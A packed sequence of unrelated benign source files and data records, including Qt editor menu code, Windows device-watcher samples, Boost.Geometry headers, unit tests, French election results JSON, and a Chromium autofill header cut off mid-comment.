Keys"))->setData(eMenuItem_CopySelectedKeys); } else // On a track { menu.addAction(tr("Copy Keys"))->setData(eMenuItem_CopyKeys); } if (!bReadOnly) { menu.addAction(tr("Paste Keys"))->setData(eMenuItem_PasteKeys); if (onNode) { menu.addSeparator(); node->InsertMenuOptions(&menu); } } } // add layers submenu bool bTracksToAdd = false; if (onValidItem && !bReadOnly) { menu.addSeparator(); // List`s which tracks can be added to animation node. const int validParamCount = node->GetParamCount(); for (int i = 0; i < validParamCount; ++i) { CSequencerNode::SParamInfo paramInfo; if (!node->GetParamInfo(i, paramInfo)) { continue; } if (!node->CanAddTrackForParameter(paramInfo.paramId)) { continue; } menuAddTrack.addAction(paramInfo.name)->setData(eMenuItem_AddLayer_First + i); bTracksToAdd = true; } } if (!bReadOnly) { if (bTracksToAdd) { menuAddTrack.setTitle(tr("Add Layer")); menu.addMenu(&menuAddTrack); } } else { menu.addAction(tr("Create Instance for Current Tags"))->setData(eMenuItem_CreateForCurrentTags); } if (onTrack) { menu.addAction(tr("Copy Layer"))->setData(eMenuItem_CopyLayer); } if (!bReadOnly) { if (bTracksToAdd) { bool canPaste = node && CanPasteTrack(node); QAction* action = menu.addAction(tr("Paste Layer")); action->setData(eMenuItem_PasteLayer); action->setEnabled(canPaste); } if (onTrack) { // The FragmentID and TransitionProperties Layers should not be removable if (track->GetParameterType() != SEQUENCER_PARAM_FRAGMENTID && track->GetParameterType() != SEQUENCER_PARAM_TRANSITIONPROPS) { menu.addAction(tr("Remove Layer"))->setData(eMenuItem_RemoveLayer); } } } if (bTracksToAdd || onTrack) { menu.addSeparator(); } if (onValidItem) { menu.addAction(tr("%1 Tracks").arg(node->GetName()))->setEnabled(false); // Show tracks in anim node. { CSequencerNode::SParamInfo paramInfo; for (int i = 0; i < node->GetTrackCount(); i++) { CSequencerTrack* track = node->GetTrackByIndex(i); if (!node->GetParamInfoFromId(track->GetParameterType(), paramInfo)) { continue; } // change hidden flag for this track. bool checked = true; if (track->GetFlags() & CSequencerTrack::SEQUENCER_TRACK_HIDDEN) { checked = false; } QAction* action = menu.addAction(QString::fromLatin1(" %1").arg(paramInfo.name)); action->setCheckable(true); action->setChecked(checked); action->setData(eMenuItem_ShowHide_First + i); } } } } // track menu if (m_bEditLock) { SetPopupMenuLock(&menu); } QAction* action = menu.exec(mapToGlobal(point)); int ret = action ? action->data().toInt() : 0; if (onNode) { node->ClearMenuOptions(&menu); } return ret; } int CMannNodesWidget::ShowPopupMenuMute(const QPoint& point, const QModelIndex& index) { QMenu menu; bool onNode = false; if (selectionModel()->selectedRows().count() == 1) { CSequencerNode* node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); CSequencerTrack* track = index.data(MannNodesTreeModel::TrackRole).value<CSequencerTrack*>(); bool notOnValidItem = !node; bool onValidItem = !notOnValidItem; if (onValidItem) { if (track) { // solo not active, so mute options are available menu.addAction(tr("Mute All But This"))->setData(eMenuItem_SoloNode); menu.addSeparator(); menu.addAction(track->IsMuted() ? tr("Unmute") : tr("Mute"))->setData(eMenuItem_MuteNode); menu.addSeparator(); menu.addAction(tr("Mute All"))->setData(eMenuItem_MuteAll); menu.addAction(tr("Unmute All"))->setData(eMenuItem_UnmuteAll); } else if (node) { // solo not active, so mute options are available menu.addAction(tr("Mute All But This"))->setData(eMenuItem_SoloNode); menu.addSeparator(); menu.addAction(node->IsMuted() ? tr("Unmute") : tr("Mute"))->setData(eMenuItem_MuteNode); menu.addSeparator(); menu.addAction(tr("Mute All"))->setData(eMenuItem_MuteAll); menu.addAction(tr("Unmute All"))->setData(eMenuItem_UnmuteAll); } if (m_bEditLock) { SetPopupMenuLock(&menu); } QAction* action = menu.exec(mapToGlobal(point)); int ret = action ? action->data().toInt() : 0; return ret; } } return 0; } //----------------------------------------------------------------------------- void CMannNodesWidget::SetPopupMenuLock(QMenu* menu) { if (!m_bEditLock || !menu) { return; } for (QAction* action : menu->actions()) { const QString menuString = action->text(); if (menuString != tr("Expand") && menuString != tr("Collapse")) { action->setEnabled(false); } } } void CMannNodesWidget::resizeEvent(QResizeEvent* event) { QTreeView::resizeEvent(event); header()->resizeSection(0, width() - 2 * frameWidth() - 32); SyncKeyCtrl(); } QModelIndex CMannNodesWidget::SaveVerticalScrollPos() const { return indexAt(QPoint(0, 0)); } void CMannNodesWidget::RestoreVerticalScrollPos(const QModelIndex& index) { scrollTo(index, QAbstractItemView::PositionAtTop); } ////////////////////////////////////////////////////////////////////////// CSequencerNode* CMannNodesWidget::IsPointValidForAnimationInContextDrop(const QModelIndex& index, const QMimeData* pDataObject) const { if (!CMannequinDialog::GetCurrentInstance()->IsPaneSelected<CFragmentEditorPage*>()) { return nullptr; } QString clipFormat = EditorDragDropHelpers::GetAnimationNameClipboardFormat(); auto hData = pDataObject->data(clipFormat); if (hData.isNull()) { return nullptr; } string sAnimName = hData.data(); if (sAnimName.empty()) { return nullptr; } if (!m_model->sequence()) { return nullptr; } if (m_bEditLock) { return nullptr; } auto node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); if (!node) { return nullptr; } if (!node->CanAddTrackForParameter(SEQUENCER_PARAM_ANIMLAYER)) { return nullptr; } return node; } ////////////////////////////////////////////////////////////////////////// // Assume IsPointValidForAnimationInContextDrop returned true bool CMannNodesWidget::CreatePointForAnimationInContextDrop(CSequencerNode* node, const QPoint& point, const QMimeData* pDataObject) { // List`s which tracks can be added to animation node. const unsigned int validParamCount = (unsigned int) node->GetParamCount(); QString clipFormat = EditorDragDropHelpers::GetAnimationNameClipboardFormat(); auto hData = pDataObject->data(clipFormat); if (hData.isNull()) { return false; } string sAnimName = hData.data(); unsigned int nAnimLyrIdx = 0; for (; nAnimLyrIdx < validParamCount; ++nAnimLyrIdx) { CSequencerNode::SParamInfo paramInfo; if (!node->GetParamInfo(nAnimLyrIdx, paramInfo)) { continue; } if (SEQUENCER_PARAM_ANIMLAYER == paramInfo.paramId) { break; } } if (nAnimLyrIdx == validParamCount) { return false; } _smart_ptr<CSequencerNode> pNode = node; AddTrack(nAnimLyrIdx, node); CSequencerTrack* pTrack = pNode->GetTrackByIndex(pNode->GetTrackCount() - 1); int keyID = pTrack->CreateKey(0.0f); CClipKey newKey; newKey.time = 0.0f; newKey.animRef.SetByString (sAnimName); pTrack->SetKey(keyID, &newKey); pTrack->SelectKey(keyID, true); return true; }
23,066
310
{ "name": "Stitcher (iOS)", "description": "A radio and podcast app.", "url": "https://itunes.apple.com/us/app/stitcher-for-podcasts/id288087905" }
60
496
<reponame>jamescodesthings/android-runtime package org.nativescript.staticbindinggenerator.generating.writing; public interface PackageNameWriter { void writePackageName(String packageName); }
57
2,504
// Copyright (c) Microsoft. All rights reserved. #include "pch.h" #include "DeviceWatcherHelper.h" #include "MainPage.xaml.h" using namespace SDKTemplate; using namespace Platform; using namespace Windows::Foundation; using namespace Windows::UI::Core; using namespace Windows::Devices::Enumeration; void DeviceWatcherHelper::StartWatcher(DeviceWatcher^ deviceWatcherArg) { deviceWatcher = deviceWatcherArg; // Connect events to update our collection as the watcher report results. deviceWatcher->Added += ref new TypedEventHandler<DeviceWatcher^, DeviceInformation^>(this, &DeviceWatcherHelper::Watcher_DeviceAdded); deviceWatcher->Updated += ref new TypedEventHandler<DeviceWatcher^, DeviceInformationUpdate^>(this, &DeviceWatcherHelper::Watcher_DeviceUpdated); deviceWatcher->Removed += ref new TypedEventHandler<DeviceWatcher^, DeviceInformationUpdate^>(this, &DeviceWatcherHelper::Watcher_DeviceRemoved); deviceWatcher->EnumerationCompleted += ref new TypedEventHandler<DeviceWatcher^, Object^>(this, &DeviceWatcherHelper::Watcher_EnumerationCompleted); deviceWatcher->Stopped += ref new TypedEventHandler<DeviceWatcher^, Object^>(this, &DeviceWatcherHelper::Watcher_Stopped); deviceWatcher->Start(); } void DeviceWatcherHelper::StopWatcher() { // Since the device watcher runs in the background, it is possible that // a notification is "in flight" at the time we stop the watcher. // In other words, it is possible for the watcher to become stopped while a // handler is running, or for a handler to run after the watcher has stopped. if (IsWatcherStarted(deviceWatcher)) { // We do not null out the deviceWatcher yet because we want to receive // the Stopped event. deviceWatcher->Stop(); } } void DeviceWatcherHelper::Reset() { if (deviceWatcher != nullptr) { StopWatcher(); deviceWatcher = nullptr; } } bool DeviceWatcherHelper::IsWatcherStarted(DeviceWatcher^ watcher) { DeviceWatcherStatus status = watcher->Status; return (status == DeviceWatcherStatus::Started) || (status == DeviceWatcherStatus::EnumerationCompleted); } bool DeviceWatcherHelper::IsWatcherRunning() { if (deviceWatcher == nullptr) { return false; } DeviceWatcherStatus status = deviceWatcher->Status; return (status == DeviceWatcherStatus::Started) || (status == DeviceWatcherStatus::EnumerationCompleted) || (status == DeviceWatcherStatus::Stopping); } void DeviceWatcherHelper::Watcher_DeviceAdded(DeviceWatcher^ sender, DeviceInformation^ deviceInfo) { // Since we have the collection databound to a UI element, we need to update the collection on the UI thread. dispatcher->RunAsync(CoreDispatcherPriority::Low, ref new DispatchedHandler( [this, sender, deviceInfo]() { // Watcher may have stopped while we were waiting for our chance to run. if (IsWatcherStarted(sender)) { resultCollection->Append(ref new DeviceInformationDisplay(deviceInfo)); RaiseDeviceChanged(sender, deviceInfo->Id); } })); } void DeviceWatcherHelper::Watcher_DeviceUpdated(DeviceWatcher^ sender, DeviceInformationUpdate^ deviceInfoUpdate) { // Since we have the collection databound to a UI element, we need to update the collection on the UI thread. dispatcher->RunAsync(CoreDispatcherPriority::Low, ref new DispatchedHandler( [this, sender, deviceInfoUpdate]() { // Watcher may have stopped while we were waiting for our chance to run. if (IsWatcherStarted(sender)) { // Find the corresponding updated DeviceInformation in the collection and pass the update object // to the Update method of the existing DeviceInformation. This automatically updates the object // for us. auto foundDeviceInfo = std::find_if(begin(resultCollection), end(resultCollection), [&](DeviceInformationDisplay^ di) { return (di->Id == deviceInfoUpdate->Id); }); if (foundDeviceInfo != end(resultCollection)) { (*foundDeviceInfo)->Update(deviceInfoUpdate); RaiseDeviceChanged(sender, deviceInfoUpdate->Id); } } })); } void DeviceWatcherHelper::Watcher_DeviceRemoved(DeviceWatcher^ sender, DeviceInformationUpdate^ deviceInfoUpdate) { // Since we have the collection databound to a UI element, we need to update the collection on the UI thread. dispatcher->RunAsync(CoreDispatcherPriority::Low, ref new DispatchedHandler( [this, sender, deviceInfoUpdate]() { // Watcher may have stopped while we were waiting for our chance to run. if (IsWatcherStarted(sender)) { // Find the corresponding DeviceInformation in the collection and remove it auto foundDeviceInfo = std::find_if(begin(resultCollection), end(resultCollection), [&](DeviceInformationDisplay^ di) {return (di->Id == deviceInfoUpdate->Id); }); uint32 index = 0; if (foundDeviceInfo != end(resultCollection) && resultCollection->IndexOf(*foundDeviceInfo, &index)) { resultCollection->RemoveAt(index); } RaiseDeviceChanged(sender, deviceInfoUpdate->Id); } })); } void DeviceWatcherHelper::Watcher_EnumerationCompleted(DeviceWatcher^ sender, Object^ e) { dispatcher->RunAsync(CoreDispatcherPriority::Low, ref new DispatchedHandler( [this, sender]() { RaiseDeviceChanged(sender, nullptr); })); } void DeviceWatcherHelper::Watcher_Stopped(DeviceWatcher^ sender, Object^ e) { dispatcher->RunAsync(CoreDispatcherPriority::Low, ref new DispatchedHandler( [this, sender]() { RaiseDeviceChanged(sender, nullptr); })); } void DeviceWatcherHelper::RaiseDeviceChanged(DeviceWatcher^ sender, String^ id) { if (UpdateStatus) { // Display a default status message. String^ message = resultCollection->Size.ToString() + " devices found."; switch (sender->Status) { case DeviceWatcherStatus::Started: break; case DeviceWatcherStatus::EnumerationCompleted: message = message + " Enumeration completed. Watching for updates..."; break; case DeviceWatcherStatus::Stopped: message = message + " Watcher stopped."; break; case DeviceWatcherStatus::Aborted: message = message + " Watcher aborted."; break; } MainPage::Current->NotifyUser(message, NotifyType::StatusMessage); } DeviceChanged(sender, id); }
2,578
354
// Boost.Geometry // Copyright (c) 2017, Oracle and/or its affiliates. // Contributed and/or modified by <NAME>, on behalf of Oracle // Use, modification and distribution is subject to the Boost Software License, // Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) #ifndef BOOST_GEOMETRY_SRS_IAU2000_HPP #define BOOST_GEOMETRY_SRS_IAU2000_HPP #include <boost/geometry/srs/projection.hpp> #include <boost/geometry/srs/projections/iau2000.hpp> #include <boost/geometry/srs/projections/iau2000_params.hpp> #include <boost/geometry/srs/projections/iau2000_traits.hpp> namespace boost { namespace geometry { namespace projections { template <typename CT> struct dynamic_parameters<srs::iau2000, CT> { static inline projections::parameters<CT> apply(srs::iau2000 const& params) { return projections::detail::pj_init_plus<CT>( srs::dynamic(), projections::detail::iau2000_to_string(params.code), false); } }; template <int Code, typename CT> class proj_wrapper<srs::static_iau2000<Code>, CT> : public static_proj_wrapper_base < typename projections::detail::iau2000_traits<Code>::static_parameters_type, CT > { typedef projections::detail::iau2000_traits<Code> iau2000_traits; typedef typename iau2000_traits::static_parameters_type static_parameters_type; typedef static_proj_wrapper_base<static_parameters_type, CT> base_t; public: proj_wrapper() : base_t(iau2000_traits::s_par(), iau2000_traits::par()) {} }; } // namespace projections namespace srs { template <int Code, typename CT> class projection<srs::static_iau2000<Code>, CT> : public projections::projection<srs::static_iau2000<Code>, CT> { typedef projections::projection<srs::static_iau2000<Code>, CT> base_t; public: projection() {} }; } // namespace srs }} // namespace boost::geometry #endif // BOOST_GEOMETRY_SRS_IAU2000_HPP
815
348
<gh_stars>100-1000 {"nom":"Saint-Géréon","circ":"6ème circonscription","dpt":"Loire-Atlantique","inscrits":2450,"abs":979,"votants":1471,"blancs":18,"nuls":9,"exp":1444,"res":[{"nuance":"REM","nom":"<NAME>","voix":714},{"nuance":"LR","nom":"<NAME>","voix":249},{"nuance":"FI","nom":"Mme <NAME>","voix":211},{"nuance":"FN","nom":"Mme <NAME>","voix":104},{"nuance":"SOC","nom":"<NAME>","voix":71},{"nuance":"DVD","nom":"Mme <NAME>","voix":26},{"nuance":"DVD","nom":"<NAME>","voix":19},{"nuance":"REG","nom":"Mme <NAME>","voix":15},{"nuance":"DVG","nom":"M. <NAME>","voix":14},{"nuance":"EXG","nom":"Mme <NAME>","voix":9},{"nuance":"REG","nom":"M. <NAME>","voix":8},{"nuance":"DIV","nom":"Mme <NAME>","voix":4}]}
287
495
/****************************************************************************** Copyright (c) 2017, <NAME>. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ******************************************************************************/ #include <gtest/gtest.h> #include <ifopt/problem.h> #include <ifopt/test_vars_constr_cost.h> using namespace ifopt; TEST(Problem, GetNumberOfOptimizationVariables) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>("var_set0")); nlp.AddVariableSet(std::make_shared<ExVariables>("var_set1")); EXPECT_EQ(2+2, nlp.GetNumberOfOptimizationVariables()); } TEST(Problem, GetBoundsOnOptimizationVariables) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>("var_set0")); nlp.AddVariableSet(std::make_shared<ExVariables>("var_set1")); auto bounds = nlp.GetBoundsOnOptimizationVariables(); EXPECT_EQ(2+2, bounds.size()); // var_set0 EXPECT_DOUBLE_EQ(-1.0, bounds.at(0).lower_); EXPECT_DOUBLE_EQ(+1.0, bounds.at(0).upper_); EXPECT_DOUBLE_EQ(-inf, bounds.at(1).lower_); EXPECT_DOUBLE_EQ(+inf, bounds.at(1).upper_); // var_set1 EXPECT_DOUBLE_EQ(-1.0, bounds.at(2).lower_); EXPECT_DOUBLE_EQ(+1.0, bounds.at(2).upper_); EXPECT_DOUBLE_EQ(-inf, bounds.at(3).lower_); EXPECT_DOUBLE_EQ(+inf, bounds.at(3).upper_); } TEST(Problem, GetVariableValues) { auto var_set0 = std::make_shared<ExVariables>("var_set0"); var_set0->SetVariables(Eigen::Vector2d(0.1, 0.2)); auto var_set1 = std::make_shared<ExVariables>("var_set1"); var_set1->SetVariables(Eigen::Vector2d(0.3, 0.4)); Problem nlp; nlp.AddVariableSet(var_set0); nlp.AddVariableSet(var_set1); Eigen::VectorXd x = nlp.GetVariableValues(); EXPECT_EQ(0.1, x(0)); EXPECT_EQ(0.2, x(1)); EXPECT_EQ(0.3, x(2)); EXPECT_EQ(0.4, x(3)); } TEST(Problem, GetNumberOfConstraints) { Problem nlp; nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint1")); // add same constraints again for testing. // notice how the Jacobian calculation inside ExConstraint-class remains the //same - the full Jacobian is stitched together accordingly. nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint2")); EXPECT_EQ(1+1, nlp.GetNumberOfConstraints()); } TEST(Problem, GetBoundsOnConstraints) { Problem nlp; nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint1")); nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint2")); auto bounds = nlp.GetBoundsOnConstraints(); // since it's an equality contraint, upper and lower bound are equal EXPECT_DOUBLE_EQ(1.0, bounds.at(0).lower_); EXPECT_DOUBLE_EQ(1.0, bounds.at(0).upper_); EXPECT_DOUBLE_EQ(1.0, bounds.at(1).lower_); EXPECT_DOUBLE_EQ(1.0, bounds.at(1).upper_); } TEST(Problem, EvaluateConstraints) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>()); nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint1")); nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint2")); double x[2] = { 2.0, 3.0 }; Eigen::VectorXd g = nlp.EvaluateConstraints(x); EXPECT_DOUBLE_EQ(2*2.0+3.0, g(0)); // constant -1 moved to bounds EXPECT_DOUBLE_EQ(2*2.0+3.0, g(1)); // constant -1 moved to bounds } TEST(Problem, GetJacobianOfConstraints) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>()); nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint1")); nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint2")); double x[2] = { 2.0, 3.0 }; nlp.SetVariables(x); auto jac = nlp.GetJacobianOfConstraints(); EXPECT_EQ(nlp.GetNumberOfConstraints(), jac.rows()); EXPECT_EQ(nlp.GetNumberOfOptimizationVariables(), jac.cols()); EXPECT_DOUBLE_EQ(2*x[0], jac.coeffRef(0,0)); // constraint 1 w.r.t x0 EXPECT_DOUBLE_EQ(1.0, jac.coeffRef(0,1)); // constraint 1 w.r.t x1 EXPECT_DOUBLE_EQ(2*x[0], jac.coeffRef(1,0)); // constraint 2 w.r.t x0 EXPECT_DOUBLE_EQ(1.0, jac.coeffRef(1,1)); // constraint 2 w.r.t x1 } TEST(Problem, EvaluateCostFunction) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>()); nlp.AddCostSet(std::make_shared<ExCost>("cost_term1")); nlp.AddCostSet(std::make_shared<ExCost>("cost_term2")); EXPECT_TRUE(nlp.HasCostTerms()); double x[2] = { 2.0, 3.0 }; EXPECT_DOUBLE_EQ(2*(-std::pow(x[1]-2.0,2)), nlp.EvaluateCostFunction(x)); // constant -1 moved to bounds } TEST(Problem, HasCostTerms) { Problem nlp; EXPECT_FALSE(nlp.HasCostTerms()); nlp.AddVariableSet(std::make_shared<ExVariables>()); EXPECT_FALSE(nlp.HasCostTerms()); nlp.AddConstraintSet(std::make_shared<ExConstraint>()); EXPECT_FALSE(nlp.HasCostTerms()); nlp.AddCostSet(std::make_shared<ExCost>()); EXPECT_TRUE(nlp.HasCostTerms()); } TEST(Problem, EvaluateCostFunctionGradient) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>()); nlp.AddCostSet(std::make_shared<ExCost>("cost_term1")); nlp.AddCostSet(std::make_shared<ExCost>("cost_term2")); double x[2] = { 2.0, 3.0 }; Eigen::VectorXd grad = nlp.EvaluateCostFunctionGradient(x); EXPECT_EQ(nlp.GetNumberOfOptimizationVariables(), grad.rows()); EXPECT_DOUBLE_EQ(0.0, grad(0)); // cost1+cost2 w.r.t x0 EXPECT_DOUBLE_EQ(2*(-2*(x[1]-2)), grad(1)); // cost1+cost2 w.r.t x1 }
2,603
32,544
package com.baeldung.resourcebundle; import java.util.Arrays; import java.util.List; import java.util.Locale; import java.util.ResourceBundle; public class ExampleControl extends ResourceBundle.Control { @Override public List<Locale> getCandidateLocales(String s, Locale locale) { return Arrays.asList(new Locale("pl", "PL")); } }
126
348
<filename>docs/data/leg-t2/065/06501260.json<gh_stars>100-1000 {"nom":"Lapeyre","circ":"1ère circonscription","dpt":"Hautes-Pyrénées","inscrits":76,"abs":27,"votants":49,"blancs":2,"nuls":0,"exp":47,"res":[{"nuance":"REM","nom":"<NAME>","voix":31},{"nuance":"FI","nom":"Mme <NAME>","voix":16}]}
125
337
""" tests for recurrence class """ import numpy as np import theano import agentnet from agentnet.memory import RNNCell,GRUCell, LSTMCell import lasagne from lasagne.layers import * def test_recurrence(): """minimalstic test""" sequence = InputLayer((None, None, 3), name='input sequence') initial = InputLayer((None, 10), name='gru zero tick') # step inp = InputLayer((None, 3)) prev_gru = InputLayer((None, 10)) gru = GRUCell(prev_gru, inp, name='rnn') rec = agentnet.Recurrence(input_sequences={inp: sequence}, state_variables={gru: prev_gru}, state_init={gru: initial}, # defaults to zeros unroll_scan=False) weights = get_all_params(rec) gru_states = rec[gru] run = theano.function([sequence.input_var, initial.input_var], get_output(gru_states), ) assert tuple(run(np.random.randn(5, 25, 3), np.random.randn(5, 10)).shape) == (5, 25, 10) def test_recurrence_larger(): """larger recurrence""" sequence = InputLayer((None, None, 3), name='input sequence') initial_cell = InputLayer((None, 20), name='lstm cell zero tick') # step inp = InputLayer((None, 3)) prev_rnn = InputLayer((None, 10)) rnn = RNNCell(prev_rnn, inp, name='rnn') prev_lstm_cell = InputLayer((None,20)) #lstm cell prev_lstm_hid = InputLayer((None, 20)) #lstm output lstm_cell,lstm_hid = LSTMCell(prev_lstm_cell,prev_lstm_hid,input_or_inputs=rnn) lstm_hid = DropoutLayer(lstm_hid,p=0.5) #dropout hid, but not cell. Just to check it works from collections import OrderedDict #one can use regular dict but that causes a warning rec = agentnet.Recurrence(input_sequences={inp: sequence}, state_variables=OrderedDict({rnn: prev_rnn, lstm_hid:prev_lstm_hid, lstm_cell:prev_lstm_cell }), state_init={lstm_cell: initial_cell}, # defaults to zeros unroll_scan=False) weights = get_all_params(rec) rnn_states = rec[rnn] lstm_cell_states = rec[lstm_cell] lstm_hid_states = rec[lstm_hid] run = theano.function([sequence.input_var, initial_cell.input_var], get_output([rnn_states,lstm_cell_states,lstm_hid_states]), updates = rec.get_automatic_updates() #if any randomness is used AND unroll_scan, # one has to pass automatic updates ) out = run(np.random.randn(5, 25, 3), np.random.randn(5, 20)) assert tuple(out[0].shape) == (5, 25, 10) #rnn assert tuple(out[1].shape) == (5, 25, 20) #lstm cell assert tuple(out[2].shape) == (5, 25, 20) #lstm hid (aka output) def test_recurrence_substituted(): """test whether it is possible to use intermediate layers as recurrence inputs""" sequence = InputLayer((None, None, 3), name='input sequence') sequence_intermediate = InputLayer((None, None, 5), name='intermediate values sequence') initial = InputLayer((None, 10), name='gru zero tick') # step inp = InputLayer((None, 3),name='input') intermediate = DenseLayer(inp,5,name='intermediate') prev_gru = InputLayer((None, 10),name='prev rnn') gru = GRUCell(prev_gru, intermediate, name='rnn') #regular recurrence, provide inputs, intermediate is computed regularly rec = agentnet.Recurrence(input_sequences={inp: sequence}, state_variables={gru: prev_gru}, state_init={gru: initial}, # defaults to zeros unroll_scan=False) weights = get_all_params(rec) assert intermediate.b in weights gru_states = rec[gru] run = theano.function([sequence.input_var, initial.input_var], get_output(gru_states), ) assert tuple(run(np.random.randn(5, 25, 3), np.random.randn(5, 10)).shape) == (5, 25, 10) #recurrence with substituted intermediate values rec2= agentnet.Recurrence(input_sequences={intermediate: sequence_intermediate}, state_variables={gru: prev_gru}, state_init={gru: initial}, # defaults to zeros unroll_scan=False) weights2 = get_all_params(rec2) assert intermediate.b not in weights2 gru_states2 = rec2[gru] run = theano.function([sequence_intermediate.input_var, initial.input_var], get_output(gru_states2), ) assert tuple(run(np.random.randn(5, 25, 5), np.random.randn(5, 10)).shape) == (5, 25, 10) def test_recurrence_mask(): """test mask_input""" np.random.seed(1337) sequence = InputLayer((None, None, 2), name='input sequence') mask = InputLayer((None, None), name="rnn mask [batch,tick]") # step inp = InputLayer((None, 2)) prev_rnn = InputLayer((None, 3)) rnn = RNNCell(prev_rnn, inp, name='rnn', nonlinearity=lasagne.nonlinearities.linear, b=lasagne.init.Constant(100.0)) # init with positive constant to make sure hiddens change out = DenseLayer(rnn,num_units=10,nonlinearity=lasagne.nonlinearities.softmax) rec = agentnet.Recurrence(input_sequences={inp: sequence}, state_variables={rnn: prev_rnn}, tracked_outputs=[out], unroll_scan=False, mask_input=mask) rnn_states = rec[rnn] outs = rec[out] run = theano.function([sequence.input_var, mask.input_var], get_output([rnn_states,outs])) seq = np.random.randn(4, 5, 2) mask = np.zeros([4, 5]) mask[:2, :3] = 1 mask[2:, 2:] = 1 h_seq, out_seq = run(seq, mask) assert tuple(h_seq.shape) == (4, 5, 3) assert tuple(out_seq.shape) == (4,5,10) diff_out = np.diff(h_seq, axis=1) assert np.all(np.diff(h_seq, axis=1)[:2, 2:] == 0) assert np.all(np.diff(h_seq, axis=1)[:2, :2] != 0) assert np.all(np.diff(h_seq, axis=1)[2:, 1:] != 0) assert np.all(np.diff(h_seq, axis=1)[2:, :1] == 0)
2,900
544
#include "countryview.h" CountryView::CountryView(QObject *parent) : QObject(parent) { }
36
1,248
<filename>src/pretix/base/migrations/0122_orderposition_web_secret.py<gh_stars>1000+ # Generated by Django 2.2.1 on 2019-05-15 13:23 from django.db import migrations, models import pretix.base.models.orders class Migration(migrations.Migration): dependencies = [ ('pretixbase', '0121_order_email_known_to_work'), ] operations = [ migrations.AddField( model_name='orderposition', name='web_secret', field=models.CharField(db_index=True, default=pretix.base.models.orders.generate_secret, max_length=32), ), ]
246
2,151
// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef COMPONENTS_AUTOFILL_CORE_BROWSER_AUTOFILL_FIELD_H_ #define COMPONENTS_AUTOFILL_CORE_BROWSER_AUTOFILL_FIELD_H_ #include <stddef.h> #include <string> #include "base/macros.h" #include "base/strings/string16.h" #include "components/autofill/core/browser/autofill_type.h" #include "components/autofill/core/browser/field_types.h" #include "components/autofill/core/browser/proto/server.pb.h" #include "components/autofill/core/common/form_field_data.h" #include "components/autofill/core/common/signatures_util.h" namespace autofill { class AutofillField : public FormFieldData { public: enum PhonePart { IGNORED = 0, PHONE_PREFIX = 1, PHONE_SUFFIX = 2, }; AutofillField(); AutofillField(const FormFieldData& field, const base::string16& unique_name); virtual ~AutofillField(); const base::string16& unique_name() const { return unique_name_; } ServerFieldType heuristic_type() const { return heuristic_type_; } ServerFieldType server_type() const { return server_type_; } const std::vector<AutofillQueryResponseContents::Field::FieldPrediction>& server_predictions() const { return server_predictions_; } HtmlFieldType html_type() const { return html_type_; } HtmlFieldMode html_mode() const { return html_mode_; } const ServerFieldTypeSet& possible_types() const { return possible_types_; } PhonePart phone_part() const { return phone_part_; } bool previously_autofilled() const { return previously_autofilled_; } const base::string16& parseable_name() const { return parseable_name_; } bool only_fill_when_focused() const { return only_fill_when_focused_; } // Setters for the detected types. void set_heuristic_type(ServerFieldType type); void set_server_type(ServerFieldType type); void set_server_predictions( const std::vector<AutofillQueryResponseContents::Field::FieldPrediction> predictions) { server_predictions_ = std::move(predictions); } void set_possible_types(const ServerFieldTypeSet& possible_types) { possible_types_ = possible_types; } void SetHtmlType(HtmlFieldType type, HtmlFieldMode mode); void set_previously_autofilled(bool previously_autofilled) { previously_autofilled_ = previously_autofilled; } void set_parseable_name(const base::string16& parseable_name) { parseable_name_ = parseable_name; } void set_only_fill_when_focused(bool fill_when_focused) { only_fill_when_focused_ = fill_when_focused; } // Set the type of the field. This sets the value returned by |Type|. // This function can be used to override the value that would be returned by // |ComputedType|. // As the |type| is expected to depend on |ComputedType|, the value will be // reset to |ComputedType| if some internal value change (e.g. on call to // (|set_heuristic_type| or |set_server_type|). // |SetTypeTo| cannot be called with // type.GetStoreableType() == NO_SERVER_DATA. void SetTypeTo(const AutofillType& type); // This function returns |ComputedType| unless the value has been overriden // by |SetTypeTo|. // (i.e. overall_type_ != NO_SERVER_DATA ? overall_type_ : ComputedType()) AutofillType Type() const; // This function automatically chooses between server and 